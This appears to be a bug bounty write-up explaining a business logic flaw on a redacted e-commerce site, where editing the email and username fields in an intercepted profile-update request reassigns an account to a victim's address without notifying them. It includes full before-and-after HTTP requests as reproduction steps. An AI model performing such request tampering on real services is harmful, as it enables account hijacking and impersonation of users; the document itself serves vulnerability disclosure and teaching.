So as usual this writeup will be divided into three sections

1. Introduction.
2. Vulnerability Description.
3. Steps to reproduce.

What are business logic vulnerabilities?

Business logic vulnerabilities are flaws in the design and implementation of an application that allows an attacker to elicit unintended behaviour. This potentially enables attackers to manipulate legitimate functionality to achieve a malicious goal. These flaws are generally the result of failing to anticipate unusual application states that may occur and, consequently, failing to handle them safely.

Read more about it at https://portswigger.net/web-security/logic-flaws

So let's start with the introduction of our target. The target that I was hunting on is an e-commerce website. Which has all the basic functionalities that an e-commerce store should have.

Target Functionality: 2FA, log in and Signups, Profile Editing, Carts, Checkout etc.

In this writeup, we are focusing on profile editing functionality as I found the business logic flaw in this particular functionality.

Let me ask you, what are the basic functions that a developer includes on a profile editing page?

Answer: Ability for a user to change his email address, edit his name and change other basic information.

So now that we know the basic things and we have a scope of functionalities to test, so let's start with our attack methodology.

The application let me change the basic info in my profile but somehow didn't give me any permission to change my email address. And I was like that’s kinda SUS.

So I just wanted to see the request it made when I wanted to update the basic things like name etc. ( Explained in detail, later in the writeup )

I intercepted that particular request and what I saw was kinda surprising.

Even though I only wanted to change my name, the request was sent all the other profile data with it including my present email ( in emailAddress & username parameter ). So as I was not allowed to change my email address normally I thought why not change the email address in this particular request by updating the email address & username parameter.

I updated the parameters with the victim’s email address and to my surprise, it WORKED. Keep in mind that I didn't stop here, hehe.

The email address was updated successfully. Now I just have to expand this vulnerability impact and that I have shown in my Steps to reproduce.

1) Make an account on https://www.****.in/en/ and verify it.
2) Visit the edit profile page of https://www.****.in/en/ and for the sake of this attack edit anything on the edit profile page.
3) And now click on the save changes button and intercept that request in the burp suite.

Intercepted Request will look like this:

PUT /useraccounts/users/5f53963ea829f23e7dfa2fc3 HTTP/1.1
Host: dl****.execute-api.ap-south-1.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.*****.in/
Authorization: Bearer eyJhbG****dhMjEyNTM1M2QxIiwiY2xpZW50X2lkIjoidGVzdCJ9.2xHW9goHxG08dw28q-1xHyyXWvevelTJ6E-IU0_yh50
Content-Type: application/json
Content-Length: 939
Origin: https://www.****.in
Connection: close{"id":"5f53963ea829f23e7***","creationDate":***,"modifyDate":1599316219***,"firstName":"Karan","lastName":"Arora","mobileNo":"***943914","emailAddress":"adversaryc***@gmail.com”,dateOfBirth":1016562600000,"gender":"male","shorterTestTaken":false,"longerTestTaken":false,"alternateEmailAddress":"","careerIntentId":"5ea9e91bdd50a63d28c5ca9b","lang":"en","userEnrollments":{"id":null,"userId":"5f53963ea829f23e7dfa2fc3","onlineTestEnrollments":{"categories":[],"tests":[]}},"appliedforWonk":false,"isDOBUpdated":true,"username":"adversaryc***@gmail.com"}

Now change the highlighted parameter and change the email address to the victim’s email address.

Victims email address: karn***@gmail.com

Changed Request

PUT /useraccounts/users/5f53963ea829f23e7dfa2fc3 HTTP/1.1
Host: dl****.execute-api.ap-south-1.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.*****.in/
Authorization: Bearer eyJhbG****dhMjEyNTM1M2QxIiwiY2xpZW50X2lkIjoidGVzdCJ9.2xHW9goHxG08dw28q-1xHyyXWvevelTJ6E-IU0_yh50
Content-Type: application/json
Content-Length: 939
Origin: https://www.****.in
Connection: close{"id":"5f53963ea829f23e7***","creationDate":***,"modifyDate":1599316219***,"firstName":"Karan","lastName":"Arora","mobileNo":"***943914","emailAddress":"karn***@gmail.com",dateOfBirth":1016562600000,"gender":"male","shorterTestTaken":false,"longerTestTaken":false,"alternateEmailAddress":"","careerIntentId":"5ea9e91bdd50a63d28c5ca9b","lang":"en","userEnrollments":{"id":null,"userId":"5f53963ea829f23e7dfa2fc3","onlineTestEnrollments":{"categories":[],"tests":[]}},"appliedforWonk":false,"isDOBUpdated":true,"username":"karn***@gmail.com"}

And forward this request. Now the account will be updated and you can see the changes that occurred on the profile page.

Note that there will be no notification sent to the victim’s email address which will act as a bonus for the attacker and this helped me increase the vulnerability impact.

To double-check that changes have taken place, I logged out and tried login with the attacker’s original email adver***@gmail.com ( this was another vulnerability that was later added to my overall reward, as the attacker was able to login with his old email address, even after updating it with the new one.)

Go to the profile section and you will see the default email address of victim karn***@gmail.com instead of the attacker’s email and now any changes an attacker performs on this account will be logged as performed by karn***@gmail.com.

And that’s how I disrupted their application’s whole account registration functionality.

Twitter ⬇

https://twitter.com/Itskaranxa

IF YOU FELT THIS WAS WORTH YOUR TIME THEN

SUBSCRIBE FOR MORE. STAY CURIOUS !!